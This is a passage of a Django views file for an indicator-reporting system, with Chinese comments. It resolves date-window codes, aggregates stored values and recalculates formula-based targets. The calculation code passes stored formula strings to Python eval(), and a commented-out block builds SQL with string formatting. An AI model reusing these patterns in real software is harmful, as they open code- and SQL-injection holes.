{'datadate': newdate}\n # 上月末,当月为1月,则取去年12月份数据\n if cond == \"ELME\":\n date_now = date.replace(day=1)\n newdate = date_now + datetime.timedelta(days=-1)\n condtions = {'datadate': 
newdate}\n\n if cond == \"LMS\":\n date_now = date.replace(day=1)\n date_now = date_now + datetime.timedelta(days=-1)\n newdate = datetime.datetime(date_now.year, date_now.month, 1)\n condtions = {'datadate': newdate}\n\n if cond == \"YS\":\n newdate = date.replace(month=1, day=1)\n condtions = {'datadate': newdate}\n if cond == \"YE\":\n newdate = date.replace(month=12, day=31)\n condtions = {'datadate': newdate}\n if cond == \"LYS\":\n newdate = date.replace(month=1, day=1)\n newdate = newdate + datetime.timedelta(days=-1)\n newdate = datetime.datetime(newdate.year, 1, 1)\n condtions = {'datadate': newdate}\n if cond == \"LYE\":\n newdate = date.replace(month=1, day=1)\n newdate = newdate + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n\n if cond == \"SS\":\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n newdate = datetime.datetime(date.year, month, 1)\n condtions = {'datadate': newdate}\n if cond == \"SE\":\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n if month == 10:\n newdate = datetime.datetime(date.year + 1, 1, 1) + datetime.timedelta(days=-1)\n else:\n newdate = datetime.datetime(date.year, month + 3, 1) + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n if cond == \"LSS\":\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n newdate = datetime.datetime(date.year, month, 1)\n newdate = newdate + datetime.timedelta(days=-1)\n newdate = datetime.datetime(newdate.year, newdate.month - 2, 1)\n condtions = {'datadate': newdate}\n if cond == \"LSE\":\n month = (date.month - 1) - (date.month - 1) % 3 + 1 # 10\n newdate = datetime.datetime(date.year, month, 1)\n newdate = newdate + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n\n if cond == \"HS\":\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n newdate = datetime.datetime(date.year, month, 1)\n condtions = {'datadate': newdate}\n if cond == \"HE\":\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n if month == 7:\n newdate = datetime.datetime(date.year + 1, 1, 1) + datetime.timedelta(days=-1)\n else:\n newdate = datetime.datetime(date.year, month + 6, 1) + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n if cond == \"LHS\":\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n newdate = datetime.datetime(date.year, month, 1)\n newdate = newdate + datetime.timedelta(days=-1)\n newdate = datetime.datetime(newdate.year, newdate.month - 5, 1)\n condtions = {'datadate': newdate}\n if cond == \"LHE\":\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n newdate = datetime.datetime(date.year, month, 1)\n newdate = newdate + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n if cond == \"SLME\":\n date_now = date.replace(day=1)\n newdate = date_now + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n\n new_date = \"\"\n if cond == \"MAVG\" or cond == \"MMAX\" or cond == \"MMIN\":\n ms_newdate = date.replace(day=1)\n me_newdate = date\n new_date = (ms_newdate, me_newdate)\n\n if cond == \"SAVG\" or cond == \"SMAX\" or cond == \"SMIN\":\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n ss_newdate = datetime.datetime(date.year, month, 1)\n se_newdate = date\n new_date = (ss_newdate, se_newdate)\n\n if cond == \"HAVG\" or cond == \"HMAX\" or cond == \"HMIN\":\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n hs_newdate = datetime.datetime(date.year, month, 1)\n he_newdate = date\n new_date = (hs_newdate, he_newdate)\n\n if cond == \"YAVG\" or cond == \"YMAX\" or cond == \"YMIN\":\n ys_newdate = 
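date.replace(month=1, day=1)\n                        # The *AVG/*MAX/*MIN window codes aggregate the chosen column over a\n                        # month-, quarter-, half-year- or year-to-date range ending at date.\n                        ys_newdate = 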
date.replace(month=1, day=1)\n ye_newdate = date\n new_date = (ys_newdate, ye_newdate)\n\n query_res = []\n if condtions:\n newdate = condtions['datadate']\n query_res = queryset.filter(**condtions).filter(target=membertarget).exclude(state=\"9\")\n if new_date:\n query_res = queryset.filter(datadate__range=new_date).filter(\n target=membertarget).exclude(state=\"9\")\n if len(query_res) <= 0:\n value = 0\n else:\n # 获取季累计、年累计等字段值\n value = 0\n if col == 'd':\n if cond == \"MAVG\" or cond == \"SAVG\" or cond == \"HAVG\" or cond == \"YAVG\":\n value = query_res.aggregate(Avg('curvalue'))[\"curvalue__avg\"]\n elif cond == \"MMAX\" or cond == \"SMAX\" or cond == \"HMAX\" or cond == \"YMAX\":\n value = query_res.aggregate(Max('curvalue'))[\"curvalue__max\"]\n elif cond == \"MMIN\" or cond == \"SMIN\" or cond == \"HMIN\" or cond == \"YMIN\":\n value = query_res.aggregate(Min('curvalue'))[\"curvalue__min\"]\n elif cond == \"SLME\" and newdate.month in [12, 3, 6, 9]: # 时间为本季上月末且当是每一季度第一个月的时候,值为0\n value = 0\n elif cond == \"LME\" and newdate.month == 12: # 上个月为12月,则当月为1月。时间为上月末且当是第一个月的时候,值为0\n value = 0\n else:\n value = query_res[0].curvalue\n if col == 'm':\n if cond == \"MAVG\" or cond == \"SAVG\" or cond == \"HAVG\" or cond == \"YAVG\":\n value = query_res.aggregate(Avg('cumulativemonth'))[\"cumulativemonth__avg\"]\n elif cond == \"MMAX\" or cond == \"SMAX\" or cond == \"HMAX\" or cond == \"YMAX\":\n value = query_res.aggregate(Max('cumulativemonth'))[\"cumulativemonth__max\"]\n elif cond == \"MMIN\" or cond == \"SMIN\" or cond == \"HMIN\" or cond == \"YMIN\":\n value = query_res.aggregate(Min('cumulativemonth'))[\"cumulativemonth__min\"]\n elif cond == \"SLME\" and newdate.month in [12, 3, 6, 9]:\n value = 0\n elif cond == \"LME\" and newdate.month == 12:\n value = 0\n else:\n value = query_res[0].cumulativemonth\n if col == 's':\n if cond == \"MAVG\" or cond == \"SAVG\" or cond == \"HAVG\" or cond == \"YAVG\":\n value = query_res.aggregate(Avg('cumulativequarter'))[\"cumulativequarter__avg\"]\n elif cond == \"MMAX\" or cond == \"SMAX\" or cond == \"HMAX\" or cond == \"YMAX\":\n value = query_res.aggregate(Max('cumulativequarter'))[\"cumulativequarter__max\"]\n elif cond == \"MMIN\" or cond == \"SMIN\" or cond == \"HMIN\" or cond == \"YMIN\":\n value = query_res.aggregate(Min('cumulativequarter'))[\"cumulativequarter__min\"]\n elif cond == \"SLME\" and newdate.month in [12, 3, 6, 9]:\n value = 0\n elif cond == \"LME\" and newdate.month == 12:\n value = 0\n else:\n value = query_res[0].cumulativequarter\n if col == 'h':\n if cond == \"MAVG\" or cond == \"SAVG\" or cond == \"HAVG\" or cond == \"YAVG\":\n value = query_res.aggregate(Avg('cumulativehalfyear'))[\n \"cumulativehalfyear__avg\"]\n elif cond == \"MMAX\" or cond == \"SMAX\" or cond == \"HMAX\" or cond == \"YMAX\":\n value = query_res.aggregate(Max('cumulativehalfyear'))[\n \"cumulativehalfyear__max\"]\n elif cond == \"MMIN\" or cond == \"SMIN\" or cond == \"HMIN\" or cond == \"YMIN\":\n value = query_res.aggregate(Min('cumulativehalfyear'))[\n \"cumulativehalfyear__min\"]\n elif cond == \"SLME\" and newdate.month in [12, 3, 6, 9]:\n value = 0\n elif cond == \"LME\" and newdate.month == 12:\n value = 0\n else:\n value = query_res[0].cumulativehalfyear\n if col == 'y':\n if cond == \"MAVG\" or cond == \"SAVG\" or cond == \"HAVG\" or cond == \"YAVG\":\n value = query_res.aggregate(Avg('cumulativeyear'))[\"cumulativeyear__avg\"]\n elif cond == \"MMAX\" or cond == \"SMAX\" or cond == \"HMAX\" or cond == \"YMAX\":\n value = 
query_res.aggregate(Max('cumulativeyear'))[\"cumulativeyear__max\"]\n elif cond == \"MMIN\" or cond == \"SMIN\" or cond == \"HMIN\" or cond == \"YMIN\":\n value = query_res.aggregate(Min('cumulativeyear'))[\"cumulativeyear__min\"]\n elif cond == \"SLME\" and newdate.month in [12, 3, 6, 9]:\n value = 0\n elif cond == \"LME\" and newdate.month == 12:\n value = 0\n else:\n value = query_res[0].cumulativeyear\n # 公式中指标替换成值\n formula = formula.replace(\"<\" + th + \">\", str(value))\n\n # 根据公式计算出值\n try:\n todayvalue = eval(formula)\n except:\n pass\n\n calculatedata = tableList[\"Calculatedata\"].objects.exclude(state=\"9\").filter(target_id=target.id).filter(\n datadate=date)\n if len(calculatedata) > 0:\n calculatedata = calculatedata[0]\n else:\n calculatedata = tableList[\"Calculatedata\"]()\n calculatedata.target = target\n calculatedata.datadate = date\n # 根据倍率与保留位数得出最后的值\n calculatedata.todayvalue = todayvalue\n calculatedata.todayvalue = decimal.Decimal(str(float(calculatedata.todayvalue))) * decimal.Decimal(\n str(float(target.magnification)))\n calculatedata.todayvalue = decimal.Decimal(str(calculatedata.todayvalue)).quantize(decimal.Decimal(Digit(target.digit)),\n rounding=decimal.ROUND_HALF_UP)\n calculatedata.judgevalue = 0\n calculatedata.releasestate = ''\n calculatedata.curvalue = calculatedata.todayvalue + calculatedata.judgevalue\n\n # 累计值计算\n if target.cumulative in ['1', '2', '3', '4', '5']:\n cumulative = getcumulative(tableList, target, date, decimal.Decimal(str(calculatedata.curvalue)))\n calculatedata.cumulativemonth = cumulative[\"cumulativemonth\"]\n calculatedata.cumulativequarter = cumulative[\"cumulativequarter\"]\n calculatedata.cumulativehalfyear = cumulative[\"cumulativehalfyear\"]\n calculatedata.cumulativeyear = cumulative[\"cumulativeyear\"]\n # 保存最终计算公式\n calculatedata.formula = target.formula\n calculatedata.save()\n # 保存该次计算guid,不再参与本次计算\n target.calculateguid = guid\n target.save()\n\n\ndef ajax_cumulate(request):\n if request.user.is_authenticated():\n cur_value = request.POST.get('cur_value', '')\n target_id = request.POST.get('target_id', '')\n reporting_date = request.POST.get('reporting_date', '')\n cycletype = request.POST.get('cycletype', '')\n result = {}\n try:\n reporting_date = getreporting_date(reporting_date, cycletype)\n except:\n result['status'] = 0\n result['data'] = \"报表日期处理出错。\"\n else:\n try:\n target = Target.objects.get(id=int(target_id))\n except:\n result['status'] = 0\n result['data'] = \"当前指标不存在。\"\n else:\n tableyear = str(reporting_date.year)\n tableList = {\n \"Entrydata\": getmodels(\"Entrydata\", tableyear),\n \"Meterdata\": getmodels(\"Meterdata\", tableyear),\n \"Extractdata\": getmodels(\"Extractdata\", tableyear),\n \"Calculatedata\": getmodels(\"Calculatedata\", tableyear)\n }\n\n cumulative = getcumulative(tableList, target, reporting_date, decimal.Decimal(str(cur_value)))\n cumulativemonth = cumulative[\"cumulativemonth\"]\n cumulativequarter = cumulative[\"cumulativequarter\"]\n cumulativehalfyear = cumulative[\"cumulativehalfyear\"]\n cumulativeyear = cumulative[\"cumulativeyear\"]\n\n result['status'] = 1\n result['data'] = {\n \"cumulativemonth\": cumulativemonth,\n \"cumulativequarter\": cumulativequarter,\n \"cumulativehalfyear\": cumulativehalfyear,\n \"cumulativeyear\": cumulativeyear\n }\n\n return JsonResponse(result)\n else:\n return HttpResponseRedirect('/login')\n\n\ndef single_reextract(request):\n \"\"\"\n 对单个指标重新提取\n \"\"\"\n if request.user.is_authenticated():\n status = 1\n info = \"重新提取成功\"\n\n 
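# Re-extract a single target's value: resolve the Target row, normalize\n        # reporting_date for its cycle, re-pull todayvalue from the data source,\n        # then rebuild the cumulative columns.\n        # Example POST body (hypothetical values): target_id=42&reporting_date=2020-08-01\n        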
target_id = request.POST.get(\"target_id\", \"\")\n reporting_date = request.POST.get('reporting_date', '')\n\n try:\n c_target = Target.objects.get(id=int(target_id))\n except:\n status = 0\n info = \"当前指标不存在\"\n else:\n cycletype = c_target.cycletype\n operationtype = c_target.operationtype\n\n try:\n reporting_date = getreporting_date(reporting_date, cycletype)\n except:\n status = 0\n info = \"时间处理异常\"\n else:\n tableyear = str(reporting_date.year)\n\n EntryTable = getmodels(\"Entrydata\", tableyear)\n MeterTable = getmodels(\"Meterdata\", tableyear)\n ExtractTable = getmodels(\"Extractdata\", tableyear)\n CalculateTable = getmodels(\"Calculatedata\", tableyear)\n tableList = {\"Entrydata\": EntryTable, \"Meterdata\": MeterTable, \"Extractdata\": ExtractTable,\n \"Calculatedata\": CalculateTable}\n\n # 根据指标周期修改reporting_date\n a_cycle_aft_date = get_a_cycle_aft(reporting_date, cycletype)\n if operationtype == \"16\":\n extractdata = getmodels(\"Extractdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target_id=c_target.id).filter(datadate=reporting_date)\n if len(extractdata) > 0:\n extractdata = extractdata[0]\n # tablename = \"\"\n # try:\n # tablename = c_target.storage.tablename\n # except:\n # pass\n #\n # rows = []\n # if tablename:\n # try:\n # with connection.cursor() as cursor:\n # reporting_date_stf = reporting_date.strftime(\"%Y-%m-%d %H:%M:%S\")\n # strsql = \"SELECT curvalue FROM {tablename} WHERE target_id='{target_id}' AND datadate='{datadate}' ORDER BY id DESC\".format(\n # tablename=tablename, target_id=c_target.id, datadate=reporting_date_stf\n # )\n # cursor.execute(strsql)\n # rows = cursor.fetchall()\n # connection.close()\n # except Exception as e:\n # pass\n # if len(rows) > 0:\n # try:\n # if c_target.is_repeat == '2':\n # rownum = 0\n # rowvalue = 0\n # for row in rows:\n # if row[0] is not None:\n # rowvalue += row[0]\n # rownum += 1\n # extractdata.todayvalue = rowvalue / rownum\n # else:\n # extractdata.todayvalue = rows[0][0]\n # extractdata.todayvalue = decimal.Decimal(\n # float(extractdata.todayvalue) * float(c_target.magnification))\n # extractdata.todayvalue = round(extractdata.todayvalue, c_target.digit)\n # except:\n # pass\n # if not rows or not c_target.cycle: # 没取到数据 或者 没有取数周期,根据数据源实时取\n ret = Extract.getDataFromSource(c_target, a_cycle_aft_date)\n result_list = ret[\"result\"]\n if result_list:\n try:\n if c_target.is_repeat == '2':\n rownum = 0\n rowvalue = 0\n for row in result_list:\n if row[0] is not None:\n rowvalue += row[0]\n rownum += 1\n extractdata.todayvalue = rowvalue / rownum\n else:\n extractdata.todayvalue = result_list[0][0]\n extractdata.todayvalue = decimal.Decimal(extractdata.todayvalue)\n extractdata.todayvalue = round(extractdata.todayvalue, c_target.digit)\n except Exception as e:\n info = str(e)\n extractdata.curvalue = extractdata.todayvalue + extractdata.judgevalue\n if c_target.cumulative in ['1', '2', '3', '4', '5']:\n cumulative = getcumulative(tableList, c_target, reporting_date, extractdata.curvalue)\n extractdata.cumulativemonth = cumulative[\"cumulativemonth\"]\n extractdata.cumulativequarter = cumulative[\"cumulativequarter\"]\n extractdata.cumulativehalfyear = cumulative[\"cumulativehalfyear\"]\n extractdata.cumulativeyear = cumulative[\"cumulativeyear\"]\n extractdata.save()\n info = \"{0}{1}\".format(c_target.name, info)\n return JsonResponse({\n \"status\": status,\n \"info\": info,\n })\n\n\ndef recalculate_targets_formula_contains(target, date, guid, all_constant, all_target, 
tableList, contains_self=True):\n    \"\"\"\n    Recalculate every calculated target whose formula contains the current target.\n    @param target: the target whose value changed\n    @param date: reporting date\n    @param guid: per-pass marker; targets whose calculateguid already equals this\n                 guid were recalculated in this pass and are skipped\n    @param all_constant: cached constant rows\n    @param all_target: cached target rows\n    @param tableList: year-sharded data models\n    @param contains_self: whether to recalculate the current target itself\n    @return: True on success, False on failure\n    \"\"\"\n    try:\n        all_targets = all_target.exclude(calculateguid=guid)\n        if contains_self:  # recalculate the current target itself first\n            getcalculatedata(target, date, guid, all_constant, all_target, tableList, forward=False)\n\n        # then every calculated target whose formula references this one\n        for t in all_targets:\n            if t.operationtype == \"17\":\n                ts_contained = get_targets_from_formula(t.formula)\n                if target.code in ts_contained and t.calculateguid != guid:\n                    recalculate_targets_formula_contains(t, date, guid, all_constant, all_target, tableList)\n    except Exception as e:\n        print(e)\n        return False\n    return True\n\n\ndef single_recalculate(request):\n    if request.user.is_authenticated():\n        target_id = request.POST.get(\"target_id\", \"\")\n        reporting_date = request.POST.get('reporting_date', '')\n        recalculate_type = request.POST.get('recalculate_type', '')\n        status = 1\n        info = \"重新计算成功\"\n        try:\n            c_target = Target.objects.get(id=int(target_id))\n        except:\n            status = 0\n            info = \"当前指标不存在\"\n        else:\n            cycletype = c_target.cycletype\n            operationtype = c_target.operationtype\n\n            try:\n                reporting_date = getreporting_date(reporting_date, cycletype)\n            except:\n                status = 0\n                info = \"时间处理异常\"\n            else:\n                if operationtype == \"17\":\n                    guid = uuid.uuid1()\n                    all_constant = Constant.objects.exclude(state=\"9\").values()\n                    all_target = Target.objects.exclude(state=\"9\")\n                    tableyear = str(reporting_date.year)\n\n                    EntryTable = getmodels(\"Entrydata\", tableyear)\n                    MeterTable = getmodels(\"Meterdata\", tableyear)\n                    ExtractTable = getmodels(\"Extractdata\", tableyear)\n                    CalculateTable = getmodels(\"Calculatedata\", tableyear)\n                    tableList = {\n                        \"Entrydata\": EntryTable,\n                        \"Meterdata\": MeterTable,\n                        \"Extractdata\": ExtractTable,\n                        \"Calculatedata\": CalculateTable\n                    }\n\n                    # recalculate_type \"1\" includes the target itself; anything else\n                    # only refreshes the formulas that depend on it\n                    if recalculate_type == \"1\":\n                        ret = recalculate_targets_formula_contains(c_target, reporting_date, guid, all_constant, all_target, tableList)\n                    else:\n                        ret = recalculate_targets_formula_contains(c_target, reporting_date, guid, all_constant, all_target, tableList, contains_self=False)\n                    if not ret:\n                        status = 0\n                        info = \"指标{0}重新计算失败\".format(c_target.name)\n                else:\n                    status = 0\n                    info = \"该指标不是计算指标\"\n    return JsonResponse({\n        \"status\": status,\n        \"info\": info,\n    })\n\n\ndef reporting_formulacalculate(request):\n    if request.user.is_authenticated():\n        id = request.POST.get('id', '')\n        cycletype = request.POST.get('cycletype', '')\n        reporting_date = request.POST.get('reporting_date', '')\n        try:\n            id = int(id)\n            reporting_date = getreporting_date(reporting_date, cycletype)\n        except:\n            return HttpResponse(0)\n        date = reporting_date\n\n        all_constant = Constant.objects.exclude(state=\"9\")\n        constant_codename = {}\n        for constant in all_constant:\n            code = constant.code\n            name = constant.name\n            constant_codename[code] = name\n\n        all_target = Target.objects.exclude(state=\"9\")\n        target_codename = {}\n        for target in all_target:\n            code = target.code\n            name = target.name\n            target_codename[code] = name\n        # display labels for the value-column codes and the time-window codes\n        data_field = {\"d\": \"当前值\", \"m\": \"月累积\", \"s\": \"季累积\", \"h\": \"半年累积\", \"y\": \"年累积\", \"c\": \"常数\"}\n        data_time = {\n            \"D\": \"当天\", \"L\": \"前一天\", \"N\": \"后一天\", \"MS\": \"月初\", \"ME\": \"月末\", \"LMS\": \"上月初\", \"LME\": \"上月末\", \"ELME\": \"上月末(连续)\",\n            \"SS\": \"季初\", \"SE\": \"季末\", \"LSS\": \"上季初\", \"LSE\": \"上季末\", \"HS\": \"半年初\", \"HE\": \"半年末\",\n            \"LHS\": \"前个半年初\", \"LHE\": \"前个半年末\", \"YS\": 
\"年初\", \"YE\": \"年末\", \"LYS\": \"去年初\",\n \"LYE\": \"去年末\", \"MAVG\": \"月平均值\", \"SAVG\": \"季平均值\", \"HAVG\": \"半年平均值\", \"YAVG\": \"年均值\",\n \"MMAX\": \"月最大值\", \"MMIN\": \"月最小值\", \"SMAX\": \"季最大值\", \"SMIN\": \"季最小值\",\n \"HMAX\": \"半年最大值\", \"HMIN\": \"半年最小值\", \"YMAX\": \"年最大值\", \"YMIN\": \"年最小值\", \"SLME\": \"本季上月末\"\n }\n\n calculatedata = getmodels(\"Calculatedata\", str(date.year)).objects.exclude(state=\"9\").filter(\n id=id).select_related(\"target\")\n if len(calculatedata) > 0:\n formula = calculatedata[0].formula\n target = calculatedata[0].target\n data_from = target.data_from if target else 'lc'\n\n if data_from == 'lc':\n if formula is not None:\n formula = formula.replace(\" \", \"\")\n formula_chinese = formula + \" = \" + str(round(calculatedata[0].curvalue, calculatedata[0].target.digit))\n members = formula.split('>')\n for member in members:\n if member.replace(\" \", \"\") != \"\":\n if (member.find('<') >= 0):\n col = \"d\"\n cond = \"D\"\n membertarget = member[member.find('<') + 1:]\n target_english = '<' + membertarget + '>'\n if membertarget.find(':') > 0:\n col = membertarget[membertarget.find(':') + 1:]\n membertarget = membertarget[0:membertarget.find(':')]\n if col.find(':') > 0:\n cond = col[col.find(':') + 1:]\n col = col[0:col.find(':')]\n\n value = \"\"\n if membertarget in constant_codename:\n constant_name = constant_codename[membertarget]\n constant_col = data_field[col]\n memberconstant = Constant.objects.filter(code=membertarget).exclude(state=\"9\")\n if len(memberconstant) <= 0:\n value = 0\n else:\n memberconstant = memberconstant[0]\n value = memberconstant.value\n value = \"{:f}\".format(decimal.Decimal(str(value) if str(value) else \"0\").normalize())\n constant_chinese = '<' + constant_name + ':' + constant_col + '>(' + value + ')'\n formula_chinese = formula_chinese.replace(target_english, constant_chinese)\n\n else:\n target_name = membertarget\n try:\n target_name = target_codename[membertarget]\n except:\n pass\n target_col = data_field[col]\n target_cond = data_time[cond]\n\n membertarget = Target.objects.filter(code=membertarget).exclude(state=\"9\")\n\n childid = None\n if len(membertarget) <= 0:\n value = \"指标不存在\"\n else:\n membertarget = membertarget[0]\n\n tableyear = str(date.year)\n queryset = getmodels(\"Entrydata\", tableyear).objects\n if cond == \"LYS\" or cond == \"LYE\" or (\n (cond == \"LSS\" or cond == \"LSE\") and int(date.month) < 4) or (\n (cond == \"LHS\" or cond == \"LHE\") and int(date.month) < 7) or (\n (cond == \"LMS\" or cond == \"LME\" or cond == \"SLME\" or cond == \"ELME\") and int(date.month) < 2):\n tableyear = str(int(date.year) - 1)\n operationtype = membertarget.operationtype\n if operationtype == \"1\":\n queryset = getmodels(\"Meterdata\", tableyear).objects\n if operationtype == \"15\":\n queryset = getmodels(\"Entrydata\", tableyear).objects\n if operationtype == \"16\":\n queryset = getmodels(\"Extractdata\", tableyear).objects\n if operationtype == \"17\":\n queryset = getmodels(\"Calculatedata\", tableyear).objects\n condtions = {'datadate': date}\n if cond == \"D\":\n condtions = {'datadate': date}\n if cond == \"M\":\n condtions = {'datadate__year': date.year, 'datadate__month': date.month}\n if cond == \"Y\":\n condtions = {'datadate__year': date.year}\n if cond == \"L\":\n newdate = date + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n if cond == \"N\":\n newdate = date + datetime.timedelta(days=1)\n condtions = {'datadate': newdate}\n if cond == \"MS\":\n newdate = 
date.replace(day=1)\n condtions = {'datadate': newdate}\n if cond == \"ME\":\n year = date.year\n month = date.month\n a, b = calendar.monthrange(year, month)\n newdate = datetime.datetime(year=year, month=month, day=b)\n condtions = {'datadate': newdate}\n # 上月末,当月为1月,则数据为0\n if cond == \"LME\":\n date_now = date.replace(day=1)\n newdate = date_now + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n # 上月末,当月为1月,则取去年12月份数据\n if cond == \"ELME\":\n date_now = date.replace(day=1)\n newdate = date_now + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n if cond == \"LMS\":\n date_now = date.replace(day=1)\n date_now = date_now + datetime.timedelta(days=-1)\n newdate = datetime.datetime(date_now.year, date_now.month, 1)\n condtions = {'datadate': newdate}\n\n if cond == \"YS\":\n newdate = date.replace(month=1, day=1)\n condtions = {'datadate': newdate}\n if cond == \"YE\":\n newdate = date.replace(month=12, day=31)\n condtions = {'datadate': newdate}\n if cond == \"LYS\":\n newdate = date.replace(month=1, day=1)\n newdate = newdate + datetime.timedelta(days=-1)\n newdate = datetime.datetime(newdate.year, 1, 1)\n condtions = {'datadate': newdate}\n if cond == \"LYE\":\n newdate = date.replace(month=1, day=1)\n newdate = newdate + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n\n if cond == \"SS\":\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n newdate = datetime.datetime(date.year, month, 1)\n condtions = {'datadate': newdate}\n if cond == \"SE\":\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n if month == 10:\n newdate = datetime.datetime(date.year + 1, 1, 1) + datetime.timedelta(\n days=-1)\n else:\n newdate = datetime.datetime(date.year, month + 3, 1) + datetime.timedelta(\n days=-1)\n condtions = {'datadate': newdate}\n if cond == \"LSS\":\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n newdate = datetime.datetime(date.year, month, 1)\n newdate = newdate + datetime.timedelta(days=-1)\n newdate = datetime.datetime(newdate.year, newdate.month - 2, 1)\n condtions = {'datadate': newdate}\n if cond == \"LSE\":\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n newdate = datetime.datetime(date.year, month, 1)\n newdate = newdate + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n\n if cond == \"HS\":\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n newdate = datetime.datetime(date.year, month, 1)\n condtions = {'datadate': newdate}\n if cond == \"HE\":\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n if month == 7:\n newdate = datetime.datetime(date.year + 1, 1, 1) + datetime.timedelta(\n days=-1)\n else:\n newdate = datetime.datetime(date.year, month + 6, 1) + datetime.timedelta(\n days=-1)\n condtions = {'datadate': newdate}\n if cond == \"LHS\":\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n newdate = datetime.datetime(date.year, month, 1)\n newdate = newdate + datetime.timedelta(days=-1)\n newdate = datetime.datetime(newdate.year, newdate.month - 5, 1)\n condtions = {'datadate': newdate}\n if cond == \"LHE\":\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n newdate = datetime.datetime(date.year, month, 1)\n newdate = newdate + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n if cond == \"SLME\":\n newdate = date.replace(day=1)\n newdate = newdate + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n\n new_date = \"\"\n if cond == \"MAVG\" or cond == \"MMAX\" or cond == \"MMIN\":\n ms_newdate = date.replace(day=1)\n me_newdate = date\n 
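# Month-to-date window, mirroring the aggregation windows in getcalculatedata().\n                                    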
new_date = (ms_newdate, me_newdate)\n\n if cond == \"SAVG\" or cond == \"SMAX\" or cond == \"SMIN\":\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n ss_newdate = datetime.datetime(date.year, month, 1)\n se_newdate = date\n new_date = (ss_newdate, se_newdate)\n\n if cond == \"HAVG\" or cond == \"HMAX\" or cond == \"HMIN\":\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n hs_newdate = datetime.datetime(date.year, month, 1)\n he_newdate = date\n new_date = (hs_newdate, he_newdate)\n\n if cond == \"YAVG\" or cond == \"YMAX\" or cond == \"YMIN\":\n ys_newdate = date.replace(month=1, day=1)\n ye_newdate = date\n new_date = (ys_newdate, ye_newdate)\n\n query_res = []\n if condtions:\n newdate = condtions['datadate']\n query_res = queryset.filter(**condtions).filter(target=membertarget).exclude(\n state=\"9\").select_related(\"target\")\n if new_date:\n query_res = queryset.filter(datadate__range=new_date).filter(\n target=membertarget).exclude(state=\"9\")\n\n if len(query_res) <= 0:\n if cond == \"SLME\" and newdate.month == 12:\n value = \"0\"\n else:\n value = \"数据不存在\"\n else:\n value = \"0\"\n if col == 'd':\n if cond == \"MAVG\" or cond == \"SAVG\" or cond == \"HAVG\" or cond == \"YAVG\":\n value = str(round(query_res.aggregate(Avg('curvalue'))[\"curvalue__avg\"],\n query_res[0].target.digit))\n elif cond == \"MMAX\" or cond == \"SMAX\" or cond == \"HMAX\" or cond == \"YMAX\":\n value = str(round(query_res.aggregate(Max('curvalue'))[\"curvalue__max\"],\n query_res[0].target.digit))\n elif cond == \"MMIN\" or cond == \"SMIN\" or cond == \"HMIN\" or cond == \"YMIN\":\n value = str(round(query_res.aggregate(Min('curvalue'))[\"curvalue__min\"],\n query_res[0].target.digit))\n elif cond == \"SLME\" and newdate.month in [12, 3, 6, 9]:\n value = \"0\"\n elif cond == \"LME\" and newdate.month == 12:\n value = \"0\"\n else:\n value = str(round(query_res[0].curvalue, query_res[0].target.digit))\n if operationtype == \"17\":\n childid = str(query_res[0].id)\n if col == 'm':\n if cond == \"MAVG\" or cond == \"SAVG\" or cond == \"HAVG\" or cond == \"YAVG\":\n value = str(\n round(\n query_res.aggregate(Avg('cumulativemonth'))[\n 'cumulativemonth__avg'],\n query_res[0].target.digit))\n elif cond == \"MMAX\" or cond == \"SMAX\" or cond == \"HMAX\" or cond == \"YMAX\":\n value = str(round(\n query_res.aggregate(Max('cumulativemonth'))[\"cumulativemonth__max\"],\n query_res[0].target.digit))\n elif cond == \"MMIN\" or cond == \"SMIN\" or cond == \"HMIN\" or cond == \"YMIN\":\n value = str(round(\n query_res.aggregate(Min('cumulativemonth'))[\"cumulativemonth__min\"],\n query_res[0].target.digit))\n elif cond == \"SLME\" and newdate.month in [12, 3, 6, 9]:\n value = \"0\"\n elif cond == \"LME\" and newdate.month == 12:\n value = \"0\"\n else:\n value = str(\n round(query_res[0].cumulativemonth, query_res[0].target.digit))\n if col == 's':\n if cond == \"MAVG\" or cond == \"SAVG\" or cond == \"HAVG\" or cond == \"YAVG\":\n value = str(\n round(\n query_res.aggregate(Avg('cumulativequarter'))[\n 'cumulativequarter__avg'],\n query_res[0].target.digit))\n elif cond == \"MMAX\" or cond == \"SMAX\" or cond == \"HMAX\" or cond == \"YMAX\":\n value = str(round(\n query_res.aggregate(Max('cumulativequarter'))[\n \"cumulativequarter__max\"],\n query_res[0].target.digit))\n elif cond == \"MMIN\" or cond == \"SMIN\" or cond == \"HMIN\" or cond == \"YMIN\":\n value = str(round(\n query_res.aggregate(Min('cumulativequarter'))[\n \"cumulativequarter__min\"],\n query_res[0].target.digit))\n elif cond == 
